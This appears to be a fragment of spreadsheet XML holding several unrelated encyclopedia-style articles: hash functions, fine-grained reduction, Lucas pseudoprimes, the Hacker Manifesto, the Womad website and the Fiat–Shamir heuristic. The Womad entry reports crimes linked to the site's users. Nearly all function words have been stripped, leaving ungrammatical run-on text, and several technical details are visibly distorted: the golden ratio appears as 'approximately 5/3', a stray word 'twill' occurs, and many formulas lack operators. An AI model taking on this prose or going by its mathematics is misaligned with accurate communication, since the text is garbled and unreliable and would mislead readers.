dozen, swamp pipeline. architecture hardware multiply functional units, multiply-by-inverse likely better approach. allow table size power still perform remainder division operation, computations sometimes costly. example, significantly less consider pseudorandom number generator function p(key) uniform interval hash function uniform interval n-1] p(key)/2b. replace division (possibly faster) right shift: np(key) keys hashed repeatedly, hash function costly, computing time saved precomputing hash codes storing keys. matching hash codes almost certainly means keys identical. this technique used transposition table game-playing programs, stores 64-bit hashed representation board position. universality universal hashing scheme randomized algorithm selects hashing function among family functions, probability collision distinct keys 1/m, number distinct hash values desired—independently keys. universal hashing ensures probabilistic sense) hash function application behave well using random function, distribution input data. will, however, collisions perfect hashing require operations special-purpose hash function. applicability hash function applicable variety situations. hash function allows certain table sizes, strings certain length, can't accept seed (i.e. allow double hashing) useful does. deterministic hash procedure must deterministic—meaning given input value must always generate hash value. words, must function data hashed, mathematical sense term. this requirement excludes hash functions depend external variable parameters, pseudo-random number generators time day. also excludes functions depend memory address object hashed cases address change execution happen systems certain methods garbage collection), although sometimes rehashing item possible. determinism context reuse function. example, python adds feature hash functions make randomized seed generated python process starts addition input hashed. python hash (siphash) still valid hash function used within single run. values persisted (for example, written disk) longer treated valid hash values, since next random value might differ. defined range often desirable output hash function fixed size (but below). example, output constrained 32-bit integer values, hash values used index array. such hashing commonly used accelerate data searches. producing fixed-length output variable length input accomplished breaking input data chunks specific size. hash functions used data searches arithmetic expression iteratively processes chunks input (such characters string) produce hash value. variable range many applications, range hash values different program change along (for instance, hash table needs expanded). situations, needs hash function takes parameters—the input data number allowed hash values. common solution compute fixed hash function large range (say, divide result division's remainder. power done masking shifting. when approach used, hash function must chosen result fairly uniform distribution value occur application. depending function, remainder uniform certain values e.g. prime numbers. variable range minimal movement (dynamic hash function) when hash function used store values hash table outlives program, hash table needs expanded shrunk, hash table referred dynamic hash table. hash function relocate minimum number records table resized desirable. what needed hash function h(z,n) hashed number allowed hash values h(z,n h(z,n) probability close n/(n linear hashing spiral storage examples dynamic hash functions execute constant time relax property uniformity achieve minimal movement property. extendible hashing uses dynamic hash function requires space proportional compute hash function, becomes function previous keys inserted. several algorithms preserve uniformity property require time proportional compute value h(z,n) invented.a hash function minimal movement especially useful distributed hash tables. data normalization applications, input data contain features irrelevant comparison purposes. example, looking personal name, desirable ignore distinction upper lower case letters. data, must hash function compatible data equivalence criterion used: inputs considered equivalent must yield hash value. this accomplished normalizing input hashing upper-casing letters. hashing integer data types there several common algorithms hashing integers. method giving best distribution data-dependent. simplest common methods practice modulo division method. identity hash function data hashed small enough, data (reinterpreted integer) hashed value. cost computing identity hash function effectively zero. this hash function perfect, maps input distinct hash value. meaning "small enough" depends size type used hashed value. example, java, hash code 32-bit integer. thus 32-bit integer integer 32-bit floating-point float objects simply value directly; whereas 64-bit integer long 64-bit floating-point double cannot method. other types data also hashing scheme. example, mapping character strings upper lower case, binary encoding character, interpreted integer, index table gives alternative form character ("a" "a", "8", etc.). character stored bits extended ascii latin table entries; case unicode characters, table would 17×216 1114112 entries. technique used two-letter country codes like "us" "za" country names (262 table entries), 5-digit codes like 13083 city names (100000 entries), etc. invalid data values (such country code "xx" code 00000) left undefined table mapped appropriate "null" value. trivial hash function keys uniformly sufficiently uniformly distributed space, values essentially random, considered already 'hashed'. case, number bits dialled collated index hash table. example, simple hash function might mask least significant bits result index hash table size folding folding hash code produced dividing input sections bits, table size, using parity-preserving bitwise operation combine sections, followed mask shifts trim excess bits high end. example, table size bits value 0x0123456789abcdef, five sections consisting 0x4def, 0x1357, 0x159e, 0x091a 0x8. adding, obtain 0x7aa4, 15-bit value. mid-squares mid-squares hash code produced squaring input extracting appropriate number middle digits bits. example, input 123,456,789 hash table size 10,000, squaring produces 15,241,578,750,190,521, hash code taken middle digits 17-digit number (ignoring high digit) 8750. mid-squares method produces reasonable hash code leading trailing zeros key. this variant multiplicative hashing, good arbitrary good multiplier. division hashing standard technique modulo function key, selecting divisor {\displaystyle prime number close table size, {\displaystyle h(k)=k{\bmod {m}}} table size usually power this gives distribution {\displaystyle \{0,m-1\}} this gives good results large number sets. significant drawback division hashing division microprogrammed modern architectures including times slower multiply. second drawback break clustered keys. example, keys 123000, 456000, 789000, etc. modulo 1000 address. this technique works well practice many sets sufficiently random already, probability cyclical large prime number small. algebraic coding algebraic coding variant division method hashing uses division polynomial modulo instead integer bits bits. approach, {\displaystyle m=2^{m}} postulate {\displaystyle degree polynomial {\displaystyle \mathrm (x)=x^{m}+\zeta _{m-1}x^{m-1}+...+\zeta _{0}} {\displaystyle k=(k_{n-1}...k_{1}k_{0})_{2}} regarded polynomial {\displaystyle k(x)=k_{n-1}x^{n-1}+...+k_{1}x+k_{0}} remainder using polynomial arithmetic modulo {\displaystyle k(x){\bmod {z}}(x)=h_{m-1}x^{m-1}+...+h_{1}x+h_{0}} then {\displaystyle h(k)=(h_{m-1}...h_{1}h_{0})_{2}} {\displaystyle z(x)} constructed fewer non-zero coefficients, keys share less bits guaranteed collide. function divisor 2k-1, constructed gf(2k) field. knuth gives example: n=15, m=10 t=7, {\displaystyle z(x)=x^{10}+x^{8}+x^{5}+x^{4}+x^{2}+x+1} derivation follows: {\displaystyle smallest integers {\displaystyle \{1,2,...,t\}\subseteq {\displaystyle (2j{\bmod {n}})\in s\quad \forall j\in .define {\displaystyle p(x)=\prod _{j\in s}(x-\alpha ^{j})} {\displaystyle \alpha ^{n}gf(2^{k})} coefficients {\displaystyle p(x)} computed field. then degree {\displaystyle p(x)=|s|} since {\displaystyle \alpha ^{2j}} root {\displaystyle p(x)} whenever {\displaystyle \alpha ^{j}} root, follows coefficients {\displaystyle p^{i}} {\displaystyle p(x)} satisfy {\displaystyle p_{i}^{2}=p_{i}} {\displaystyle r(x)=r_{(n-1)}x^{n-1}+...+r_{1}x+r_{0}} nonzero polynomial modulo nonzero coefficients, {\displaystyle r(x)} multiple {\displaystyle p(x)} modulo follows corresponding hash function keys fewer bits common unique indices.the usual outcome either large, twill gets large, both, scheme computationally feasible. therefore, suited hardware microcode implementation. unique permutation hashing also unique permutation hashing, guaranteed best worst-case insertion time. multiplicative hashing standard multiplicative hashing uses formula {\displaystyle h_{a}(k)=\lfloor (ak{\bmod {w}})/(w/m)\rfloor produces hash value {\displaystyle \{0,\ldots ,m-1\}} value {\displaystyle appropriately chosen value relatively prime {\displaystyle large binary representation random 0's. important practical special case occurs {\displaystyle w=2^{w}} {\displaystyle m=2^{m}} powers {\displaystyle machine word size. case formula becomes {\displaystyle h_{a}(k)=\lfloor (ak{\bmod {2}}^{w})/2^{w-m}\rfloor this special arithmetic modulo {\displaystyle 2^{w}} done default low-level programming languages integer division power simply right-shift, example, function becomes unsigned hash(unsigned return (a*k) (w-m); fixed {\displaystyle {\displaystyle translates single integer multiplication right-shift making fastest hash functions compute. multiplicative hashing susceptible "common mistake" leads poor diffusion—higher-value input bits affect lower-value output bits. transmutation input shifts span retained bits xors adds multiplication step corrects this. resulting function looks like: unsigned hash(unsigned (w-m); return (a*k) (w-m); fibonacci hashing fibonacci hashing form multiplicative hashing multiplier {\displaystyle 2^{w}/\phi {\displaystyle machine word length {\displaystyle \phi (phi) golden ratio (approximately 5/3). property multiplier uniformly distributes table space, blocks consecutive keys respect block bits key. consecutive keys within high bits bits field) relatively common. multipliers various word lengths {\displaystyle ^{w}} are: a=4050310 a=265443576910 a=17396110258977110 a=1140071481932319848510 zobrist hashing tabulation hashing, generally known zobrist hashing albert zobrist, american computer scientist, method constructing universal families hash functions combining table lookup operations. this algorithm proven fast high quality hashing purposes (especially hashing integer-number keys).zobrist hashing originally introduced means compactly representing chess positions computer game-playing programs. unique random number assigned represent type piece (six black white) space board. thus table 64x12 numbers initialized start program. random numbers could length, bits natural squares board. position transcribed cycling pieces position, indexing corresponding random numbers (vacant spaces included calculation), xoring together (the starting value could identity value xor, random seed). resulting value reduced modulo, folding operation produce hash table index. original zobrist hash stored table representation position. later, method extended hashing integers representing byte possible positions word unique 32-bit random number. thus, table 28x4 random numbers constructed. 32-bit hashed integer transcribed successively indexing table value byte plain text integer xoring loaded values together (again, starting value identity value random seed). natural extension 64-bit integers table 28x8 64-bit random numbers. this kind function nice theoretical properties, called 3-tuple independence meaning every 3-tuple keys equally likely mapped 3-tuple hash values. customised hash function hash function designed exploit existing entropy keys. keys leading trailing zeros, particular fields unused, always zero constant, generally vary little, masking volatile bits hashing provide better possibly faster hash function. selected divisors multipliers division multiplicative schemes make uniform hash functions keys cyclic redundancies. hashing variable-length data when data values long variable-length) character strings—such personal names, page addresses, mail messages—their distribution usually uneven, complicated dependencies. example, text natural language highly non-uniform distributions characters, character pairs, characteristic language. data, prudent hash function depends characters string—and depends character different way. middle ends simplistic hash functions first last characters string along length, form word-size hash middle characters string. this saves iterating (potentially long) string, hash functions hash characters string readily become linear redundancies, clustering pathologies set. such strategies effective custom hash function structure keys either middle, ends fields zero invariant constant differentiate keys; invariant parts keys ignored. character folding paradigmatic example folding characters integer values characters string. better idea multiply hash total constant, typically sizable prime number, adding next character, ignoring overflow. using exclusive 'or' instead also plausible alternative. final operation would modulo, mask, function reduce word value index size table. weakness procedure information cluster upper lower bits bytes, clustering remain hashed result cause collisions proper randomizing hash. ascii byte codes, example, upper printable strings first byte codes, information (95-byte codes) clustered remaining bits unobvious manner. classic approach dubbed hash based work peter. weinberger bell labs 1970s, originally designed hashing identifiers compiler symbol tables given "dragon book". this hash function offsets bytes bits adding together. when quantity wraps, high bits shifted non-zero, xored back byte cumulative quantity. result word size hash code modulo reducing operation applied produce final hash index. today, especially advent 64-bit word sizes, much efficient variable-length string hashing word chunks available. word length folding modern microprocessors allow much faster processing 8-bit character strings hashed processing character time, interpreting string array 64-bit integers hashing/accumulating "wide word" integer values means arithmetic operations (e.g. multiplication constant bit-shifting). final word, unoccupied byte positions, filled zeros specified "randomizing" value folded hash. accumulated hash code reduced final modulo operation yield index table. radix conversion hashing analogous ascii ebcdic character string representing decimal number converted numeric quantity computing, variable length string converted (x0ak−1+x1ak−2+...+xk−2a+xk−1). this simply polynomial radix takes components (x0,x1,...,xk−1) characters input string length used directly hash code, hash function applied potentially large value hash table size. value usually prime number least large enough hold number different characters character potential keys. radix conversion hashing strings minimizes number collisions. available data sizes restrict maximum length string hashed method. example, 128-bit double long word hash character alphabetic string (ignoring case) radix printable ascii string limited characters using radix 64-bit long word. however, alphabetic keys usually modest length, keys must stored hash table. numeric character strings usually problem; bits count 1019, decimal digits radix rolling hash applications, substring search, compute hash function every k-character substring given n-character string advancing window width characters along string; fixed integer, greater straightforward solution, extract substring every character position text compute separately, requires number operations proportional k·n. however, proper choice technique rolling hash compute hashes effort proportional number occurrences substring.the familiar algorithm type rabin-karp best average case performance o(n+mk) worst case o(n·k) fairness, worst case gravely pathological: text string substring composed repeated single character, t="aaaaaaaaaaa", s="aaa"). hash function used algorithm usually rabin fingerprint, designed avoid collisions 8-bit character strings, suitable hash functions also used. analysis worst case result hash function assessed ways: theoretical practical. theoretical worst case probability keys single slot. practical worst case expected longest probe sequence (hash function collision resolution method). this analysis considers uniform hashing, particular slot probability 1/m, characteristic universal hash functions. while knuth worries adversarial attack real time systems, gonnet shown probability case "ridiculously small". representation probability keys mapping single slot {\displaystyle {\frac {e^{-\alpha }\alpha ^{k}}{k!}}} load factor, n/m. history term hash offers natural analogy non-technical meaning chop make mess something), given hash functions scramble input data derive output. research precise origin term, donald knuth notes that, hans peter luhn appears first concept hash function memo dated january 1953, term would appear published literature late 1960s, herbert hellerman's digital computer system principles, even though already widespread jargon then. also notes references external links calculate hash given value timo denk goulburn hashing function (pdf) mayur patel hash function construction textual geometrical data retrieval (pdf) latest trends computers, vol.2, 483–489, cscc conference, corfu, 2010</t>
  </si>
  <si>
    <t>Fine-grained reduction</t>
  </si>
  <si>
    <t>computational complexity theory, fine-grained reduction transformation computational problem another, used relate difficulty improving time bounds problems. intuitively, provides method solving problem efficiently using solution problem subroutine. problem {\displaystyle solved time {\displaystyle a(n)} problem {\displaystyle solved time {\displaystyle b(n)} existence {\displaystyle (a,b)} -reduction problem {\displaystyle problem {\displaystyle implies significant speedup problem {\displaystyle would also lead speedup problem {\displaystyle definition {\displaystyle {\displaystyle computational problems, specified desired output possible input. {\displaystyle {\displaystyle time-constructible functions take integer argument {\displaystyle produce integer result. usually, {\displaystyle {\displaystyle time bounds known naive algorithms problems, often monomials {\displaystyle n^{2}} .then {\displaystyle said {\displaystyle (a,b)} -reducible {\displaystyle every real number {\displaystyle \epsilon exists real number {\displaystyle \delta algorithm solves instances problem {\displaystyle transforming sequence instances problem {\displaystyle taking time {\displaystyle o{\bigl (}a(n)^{1-\delta }{\bigr transformation instances size {\displaystyle producing sequence instances whose sizes {\displaystyle n_{i}} bounded {\displaystyle \sum _{i}b(n_{i})^{1-\epsilon }&lt;a(n)^{1-\delta {\displaystyle (a,b)} -reduction given mapping {\displaystyle \epsilon pair algorithm {\displaystyle \delta speedup implication suppose {\displaystyle {\displaystyle (a,b)} -reducible {\displaystyle exists {\displaystyle \epsilon {\displaystyle solved time {\displaystyle o{\bigl (}b(n)^{1-\epsilon }{\bigr then, assumptions, also exists {\displaystyle \delta {\displaystyle solved time {\displaystyle o{\bigl (}a(n)^{1-\delta }{\bigr namely, {\displaystyle \delta value given {\displaystyle (a,b)} -reduction, solve {\displaystyle applying transformation reduction using fast algorithm {\displaystyle resulting subproblem.equivalently, {\displaystyle cannot solved time significantly faster {\displaystyle a(n)} {\displaystyle cannot solved time significantly faster {\displaystyle b(n)} history fine-grained reductions defined, special case {\displaystyle {\displaystyle equal monomials, virginia vassilevska williams ryan williams 2010. they also showed existence {\displaystyle (n^{3},n^{3})} -reductions several problems including all-pairs shortest paths, finding second-shortest path given vertices weighted graph, finding negative-weight triangles weighted graphs, testing whether given distance matrix describes metric space. according results, either problems time bounds exponents less three, none do.the term "fine-grained reduction" comes later work virginia vassilevska williams invited presentation 10th international symposium parameterized exact computation.although original definition fine-grained reductions involved deterministic algorithms, corresponding concepts randomized algorithms nondeterministic algorithms also considered. references</t>
  </si>
  <si>
    <t>Lucas pseudoprime</t>
  </si>
  <si>
    <t>lucas pseudoprimes fibonacci pseudoprimes composite integers pass certain tests primes composite numbers pass: case, criteria relative lucas sequence. baillie-wagstaff-lucas pseudoprimes baillie wagstaff define lucas pseudoprimes follows: given integers {\displaystyle d=p^{2}-4q} uk(p, vk(p, corresponding lucas sequences. positive integer {\displaystyle \left({\tfrac {d}{n}}\right)} jacobi symbol. define {\displaystyle \delta (n)=n-\left({\tfrac {d}{n}}\right).} prime divide following congruence condition holds: congruence hold, prime. composite, congruence usually hold. these facts make lucas sequences useful primality testing. congruence represents congruences defining frobenius pseudoprime. hence, every frobenius pseudoprime also baillie-wagstaff-lucas pseudoprime, converse always hold. some good references chapter book bressoud wagon (with mathematica code), pages 142–152 book crandall pomerance, pages 53–74 book ribenboim. lucas probable primes pseudoprimes lucas probable prime given pair positive integer equation true (see, page 1398). lucas pseudoprime given pair positive composite integer equation true (see, page 1391). lucas probable prime test useful chosen jacobi symbol {\displaystyle \left({\tfrac {d}{n}}\right)} (see pages 1401–1409 page 1024 pages 266–269 this especially important combining lucas test strong pseudoprime test, baillie–psw primality test. typically implementations parameter selection method ensures condition (e.g. selfridge method recommended described below). {\displaystyle \left({\tfrac {d}{n}}\right)=-1,} equation becomes congruence false, constitutes proof composite. congruence true, lucas probable prime. case, either prime lucas pseudoprime. congruence true, likely prime (this justifies term probable prime), prove prime. case probabilistic primality test, perform additional lucas tests different unless tests proves composite, gain confidence prime. examples: sequence oeis: a006190: etc. first, jacobi symbol {\displaystyle \left({\tfrac {13}{19}}\right)} δ(n) 6616217487 19·348221973 6616217487 {\displaystyle u_{20}=6616217487\equiv 0{\pmod {19}}.} therefore, lucas probable prime pair. case prime, lucas pseudoprime. next example, 119. {\displaystyle \left({\tfrac {13}{119}}\right)} compute {\displaystyle u_{120}\equiv 0{\pmod {119}}.} however, 7·17 prime, lucas pseudoprime pair. fact, smallest pseudoprime that, order check equation given need compute first terms sequence. smallest lucas pseudoprime 323, 119, 143, 123, 129, 143, 119, 301, 155, 399, 119, strong lucas pseudoprimes now, factor {\displaystyle \delta (n)=n-\left({\tfrac {d}{n}}\right)} form {\displaystyle d\cdot 2^{s}} {\displaystyle odd. strong lucas pseudoprime given pair composite number gcd(n, satisfying conditions {\displaystyle u_{d}\equiv 0{\pmod {n}}} {\displaystyle v_{d\cdot 2^{r}}\equiv 0{\pmod {n}}} page 1396 strong lucas pseudoprime also lucas pseudoprime (for pair), converse necessarily true. therefore, strong test stringent primality test equation (1). there infinitely many strong lucas pseudoprimes, therefore, infinitely many lucas pseudoprimes. theorem states: {\displaystyle {\displaystyle relatively prime positive integers {\displaystyle p^{2}-4q} positive square. then positive constant {\displaystyle (depending {\displaystyle {\displaystyle number strong lucas pseudoprimes exceeding {\displaystyle greater {\displaystyle c\cdot \log {\displaystyle sufficiently large. {\displaystyle u_{n}} {\displaystyle v_{n}} p-fibonacci sequence p-lucas sequence, pseudoprimes called strong lucas pseudoprime base example, least strong lucas pseudoprime 4181, 169, 119, extra strong lucas pseudoprime strong lucas pseudoprime parameters satisfying conditions {\displaystyle u_{d}\equiv 0{\pmod {n}}{\text{ }}v_{d}\equiv 2{\pmod {n}}} {\displaystyle v_{d\cdot 2^{r}}\equiv 0{\pmod {n}}} {\displaystyle 0\leq r&lt;s-1} extra strong lucas pseudoprime also strong lucas pseudoprime {\displaystyle (p,q)} pair. implementing lucas probable prime test before embarking probable prime test, usually verifies number tested primality, odd, perfect square, divisible small prime less convenient limit. perfect squares easy detect using newton's method square roots. choose lucas sequence jacobi symbol {\displaystyle \left({\tfrac {d}{n}}\right)=-1} δ(n) given technique choosing trial error find first sequence −11, {\displaystyle \left({\tfrac {d}{n}}\right)=-1} note {\displaystyle \left({\tfrac {k}{n}}\right)\left({\tfrac {-k}{n}}\right)=-1} prime factor common, {\displaystyle \left({\tfrac {d}{n}}\right)=0} with sequence values, average number values must tried encounter whose jacobi symbol 1.79; see, 1416. once {\displaystyle p=1} {\displaystyle q=(1-d)/4} good idea check prime factors common this method choosing suggested john selfridge. (this search never succeed square, conversely succeed, proof square. thus, time saved delaying testing squareness first search steps failed.) given recurrence relations enable quickly compute {\displaystyle u_{n+1}} {\displaystyle v_{n+1}} {\displaystyle o(\log _{2}n)} steps; lucas sequence other relations. start off, {\displaystyle u_{1}=1} {\displaystyle v_{1}=p=1} first, double subscript {\displaystyle {\displaystyle step using recurrence relations {\displaystyle u_{2k}=u_{k}\cdot v_{k}} {\displaystyle v_{2k}=v_{k}^{2}-2q^{k}={\frac {v_{k}^{2}+du_{k}^{2}}{2}}} .next, increase subscript using recurrences {\displaystyle u_{2k+1}=(p\cdot u_{2k}+v_{2k})/2} {\displaystyle v_{2k+1}=(d\cdot u_{2k}+p\cdot v_{2k})/2} {\displaystyle p\cdot u_{2k}+v_{2k}} odd, replace {\displaystyle p\cdot u_{2k}+v_{2k}+n} even divided numerator {\displaystyle v_{2k+1}} handled way. (adding change result modulo observe that, term compute sequence, compute corresponding term sequence. proceed, also compute same, corresponding powers stage, reduce {\displaystyle {\displaystyle power {\displaystyle bits binary expansion determine terms sequence compute. example, 101100 binary), then, taking bits time left right, obtain sequence indices compute: 1002 1012 10102 10112 101102 1011002 therefore, compute u10, u11, u22, u44. also compute same-numbered terms sequence, along q10, q11, q22, q44. calculation, computed un+1, vn+1, qn+1, (mod check congruence using known value un+1. when chosen described above, first lucas pseudoprimes (see page 1401 323, 377, 1159, 1829, 3827, 5459, 5777, 9071, 9179, 10877 (sequence a217120 oeis) strong versions lucas test implemented similar way. when chosen described above, first strong lucas pseudoprimes are: 5459, 5777, 10877, 16109, 18971, 22499, 24569, 25199, 40309, 58519 (sequence a217255 oeis) calculate list extra strong lucas pseudoprimes, {\displaystyle q=1} then ..., value {\displaystyle d=p^{2}-4q} found jacobi symbol {\displaystyle \left({\tfrac {d}{n}}\right)=-1} with method selecting first extra strong lucas pseudoprimes 989, 3239, 5777, 10877, 27971, 29681, 30739, 31631, 39059, 72389 (sequence a217719 oeis) checking additional congruence conditions checked congruence true, additional congruence conditions check almost additional computational cost. happens composite, additional conditions help discover fact. prime {\displaystyle \left({\tfrac {d}{n}}\right)=-1} following (see equation page 1392 although congruence condition not, definition, part lucas probable prime test, almost free check condition because, noted above, value vn+1 computed process computing un+1. either congruence false, constitutes proof prime. congruences true, even likely prime checked congruence (2). selfridge's method (above) choosing happened adjust {\displaystyle \left({\tfrac {d}{n}}\right)} remain unchanged (see lucas sequence-algebraic relations). enhanced method choosing 11·83 composite less congruence true (see page 1409 table of;). more extensive calculations show that, method choosing five odd, composite numbers less 1015 congruence true.if {\displaystyle q\neq congruence condition involves little additional computation implemented. recall {\displaystyle q^{n+1}} computed calculation {\displaystyle u_{n+1}} easily save previously computed power {\displaystyle namely, {\displaystyle q^{(n+1)/2}} prime, then, euler's criterion, {\displaystyle q^{(n-1)/2}\equiv \left({\tfrac {q}{n}}\right){\pmod {n}}} .(here, {\displaystyle \left({\tfrac {q}{n}}\right)} legendre symbol; prime, jacobi symbol). therefore, prime, must have, jacobi symbol right side easy compute, congruence easy check. congruence hold, cannot prime. provided gcd(n, testing congruence equivalent augmenting lucas test "base solovay–strassen primality test. additional congruence conditions must satisfied prime described section conditions fails hold, proved prime. comparison miller–rabin primality test applications miller–rabin primality test declare composite probably prime probability (1/4)k. there similar probability estimate strong lucas probable prime test.aside trivial exceptions (see below), fraction (p,q) pairs (modulo declare composite probably prime (4/15). therefore, applications strong lucas test would declare composite probably prime probability (4/15)k. there trivial exceptions. p(p+2) product twin primes. such easy factor, case, (p+1)2 perfect square. quickly detect perfect squares using newton's method square roots. combining lucas pseudoprime test fermat primality test, say, base obtain powerful probabilistic tests primality, baillie–psw primality test. fibonacci pseudoprimes when un(p,q) sequence represents fibonacci numbers. fibonacci pseudoprime often: 264, 142, defined composite number divisible congruence holds (but definition, fibonacci pseudoprimes form sequence: 323, 377, 1891, 3827, 4181, 5777, 6601, 6721, 8149, 10877, (sequence a081264 oeis).the references anderson jacobsen definition. congruent modulo bressoud,: 272–273 crandall pomerance: 143, point rare fibonacci pseudoprime also fermat pseudoprime base however, congruent modulo opposite true, fibonacci pseudoprimes 1011 also base-2 fermat pseudoprimes. prime gcd(n, also have: 1392 this leads alternative definition fibonacci pseudoprime: fibonacci pseudoprime composite number congruence holds −1.this definition leads fibonacci pseudoprimes form sequence: 705, 2465, 2737, 3745, 4181, 5777, 6721, 10877, 13201, 15251, (sequence a005845 oeis),which also referred bruckman-lucas pseudoprimes.: hoggatt bicknell studied properties pseudoprimes 1974. singmaster computed pseudoprimes 100000. jacobsen lists 111443 pseudoprimes less 1013.it shown even fibonacci pseudoprimes defined equation (5). however, even fibonacci pseudoprimes exist (sequence a141137 oeis) first definition given (1). strong fibonacci pseudoprime composite number congruence holds follows: composite integer strong fibonacci pseudoprime carmichael number every prime dividing n.the smallest example strong fibonacci pseudoprime 443372888629441 17·31·41·43·89·97·167·331. pell pseudoprimes pell pseudoprime defined composite number equation true sequence pell sequence. first pseudoprimes 169, 385, 779, 899, 961, 1121, 1189, 2419, this differs definition oeis: a099011 written {\displaystyle {\text{ }}u_{n}\equiv \left({\tfrac {2}{n}}\right){\pmod {n}}} defining pell sequence. first pseudoprimes 169, 385, 741, 961, 1121, 2001, 3827, 4879, 5719, 6215 third definition uses equation −1), leading pseudoprimes 169, 385, 961, 1105, 1121, 3827, 4901, 6265, 6441, 6601, 7107, 7801, 8119, references external links anderson, peter fibonacci pseudoprimes, factors, entry points. anderson, peter fibonacci pseudoprimes 2,217,967,487 factors. jacobsen, dana pseudoprime statistics, tables, data (data lucas, strong lucas, lucas, lucas pseudoprimes 1014; fibonacci pell pseudoprimes 1012) weisstein, eric "fibonacci pseudoprime". mathworld. weisstein, eric "lucas pseudoprime". mathworld. weisstein, eric "strong lucas pseudoprime". mathworld. weisstein, eric "extra strong lucas pseudoprime". mathworld.</t>
  </si>
  <si>
    <t>Hacker Manifesto</t>
  </si>
  <si>
    <t>conscience hacker (also known hacker manifesto) small essay written january 1986 computer security hacker went handle pseudonym) mentor (born loyd blankenship), belonged second generation hacker group legion doom.it written author's arrest, first published underground hacker ezine phrack found many websites, well t-shirts films.considered cornerstone hacker culture, manifesto asserts point hacking supersedes selfish desires exploit harm people, technology used expand horizons keep world free. when asked motivation writing article, blankenship said, going hacking withdrawal, craig/knight lightning needed something upcoming issue phrack. reading moon harsh mistress taken idea revolution. prominent public event, asked arrest motivation writing article, blankenship said, computer shouldn’t been. [had] great deal empathy friends around nation also situation. this post-wargames, movie, pretty much public perception hackers time ‘hey, we’re going start nuclear war, play tic-tac-toe, two,’ decided would write really felt essence popular culture article quoted several times 1995 movie hackers, although movie read issue hacker magazine 2600, historically accurate phrack. mentor gave reading hacker manifesto offered additional insight h2k2. also item game culpa innata. poster hacker manifesto appears 2010 film social network harvard room mark zuckerberg. hacker manifesto mentioned edward snowden's autobiography permanent record. amplitude problem's 2019 album crime curiosity, featuring mentor himself, ytcracker, inverse phase linux kernel maintainer king fisher triad dedicated hacker manifesto. each song title phrase essay. also hacker ethic timeline computer security hacker history references external links full text hacker manifesto wikisource hacker's manifesto phrack magazine</t>
  </si>
  <si>
    <t>Womad (website)</t>
  </si>
  <si>
    <t>womad (korean: 워마드) radical feminist online community based south korea. criticized anti-male sentiment. split megalia, another feminist online community based south korea. overview womad split megalia january 2016. "womad" combination words "woman" "nomad". formed megalia issuing certain explicit slurs transgender people. this change policy migration anti-lgbt members. womad users respond discrimination women south korea "mirroring" men. according experts, reaction ilbe storage, right-wing website also based south korea. website contributed anti-feminist backlash south korea. however, according womad itself, users feminist group.womad caused controversy extreme online trolling postings boast animal abuse show extreme hatred towards transgender people; reason, womad called "korean-style terfs". they also described "neoliberal". users site remained supportive former president south korea, park geun-hye, imprisoned following 2016 south korean political scandal. embroiled number accusations mocking korean veterans labor rights activists. number posts mocking deceased actor joo-hyuk caused controversy. following incidents, critics lambasted womad "hateful website aggravating conflict division society" among south koreans.the site voting system similar reddit, allowing users upvote downvote posts. uses swastika symbol 'thumbs-up' button, '워념글 written below, meaning 'suggest insightful article' korean. favicon representation vulva, center representing period blood fire. incidents claims murders targeting 2016, multiple posts appeared site, claiming killed titles coffee mixed antifreeze liquid" killed pushing reservoir". ulsan metropolitan police agency gwangju metropolitan police agency started investigation receiving police reports july 2016. several shutdown requests made community, daum kakao dismissed requests stating "some posts hidden, insufficient illegal activity within community shut down". child-abuse incident australia november 2017, member wrote post womad forum claiming raped australian boy. uploaded photos videos allegedly portraying raping boy. womad members showed support writer, leaving comments saying would watch videos sexual assault. news post quickly spread online petition started cheong dae’s bulletin board requesting person responsible caught. november 2017, 27-year-old korean woman identified "areum lee" arrested australian federal police darwin, northern territory relation incident. suspect charged producing child abuse materials. announced remain custody court hearing scheduled mid-january 2018. according interviews victim's parents, suspected identification credentials fake could broken immigration labor laws. womad members actively defended her, claimed areum innocent conducted online fundraiser lawyer appointment. addition, sent petition australian police "release areum lee" protested victim's parents. many shocked incident. hidden camera incident 2018, womad user posted nude photo male model, obtained using hidden camera molka). user quickly arrested. womad users alleged arrested quickly gender. incident hyehwa station protest. also inside feminism south korea gender-based violence megalia misandry references external links womad korean)</t>
  </si>
  <si>
    <t>Fiat–Shamir heuristic</t>
  </si>
  <si>
    <t>cryptography, fiat–shamir heuristic technique taking interactive proof knowledge creating digital signature based this way, fact (for example, knowledge certain secret number) publicly proven without revealing underlying information. technique amos fiat shamir (1986). method work, original interactive proof must property public-coin, i.e. verifier's random coins made public throughout proof protocol. heuristic originally presented without proof security; later, pointcheval stern proved security chosen message attacks random oracle model, assuming random oracles exist. this result generalized quantum-accessible random oracle (qrom) don, fehr, majenz schaffner, concurrently zhandry. case random oracles exist, fiat–shamir heuristic proven insecure shafi goldwasser yael tauman kalai. fiat–shamir heuristic thus demonstrates major application random oracles. more generally, fiat–shamir heuristic also viewed converting public-coin interactive proof knowledge non-interactive proof knowledge. interactive proof used identification tool, non-interactive version used directly digital signature using message part input random oracle. example algorithm specified below, readers familiar laws modular arithmetic, especially multiplicative groups integers modulo prime here interactive proof knowledge discrete logarithm. peggy wants prove victor verifier knows {\displaystyle discrete logarithm {\displaystyle y=g^{x}} base {\displaystyle (mod picks random {\displaystyle v\in \mathbb _{q}^{*}} computes {\displaystyle t=g^{v}} sends {\displaystyle victor. victor picks random {\displaystyle c\in \mathbb _{q}^{*}} sends peggy. peggy computes {\displaystyle r=v-cx{\bmod {\lambda }}(q)} returns {\displaystyle victor. checks whether {\displaystyle t\equiv g^{r}y^{c}} this holds {\displaystyle g^{r}y^{c}=g^{v-cx}g^{xc}=g^{v}=t} .fiat–shamir heuristic allows replace interactive step non-interactive random oracle access. practice, cryptographic hash function instead. peggy wants prove knows {\displaystyle discrete logarithm {\displaystyle y=g^{x}} base {\displaystyle picks random {\displaystyle v\in \mathbb _{q}^{*}} computes {\displaystyle t=g^{v}} peggy computes {\displaystyle c=h(g,y,t)} {\displaystyle h()} cryptographic hash function. computes {\displaystyle r=v-cx{\bmod {\lambda }}(q)} resulting proof pair {\displaystyle (t,r)} anyone proof calculate {\displaystyle check whether {\displaystyle t\equiv g^{r}y^{c}} {\displaystyle exponent {\displaystyle we're using cyclic groups order {\displaystyle calculated modulo {\displaystyle \lambda (q)} modulo {\displaystyle {\displaystyle \lambda (q)} {\displaystyle q-1} case {\displaystyle prime order group. hash value used depend (public) value security scheme weakened, malicious prover select certain value product known. extension method long fixed random generator constructed data known parties, interactive protocol transformed non-interactive one. also random oracle model non-interactive zero-knowledge proof application anonymous veto network forking lemma references</t>
  </si>
  <si>
    <t>List decoding</t>
  </si>
  <si>
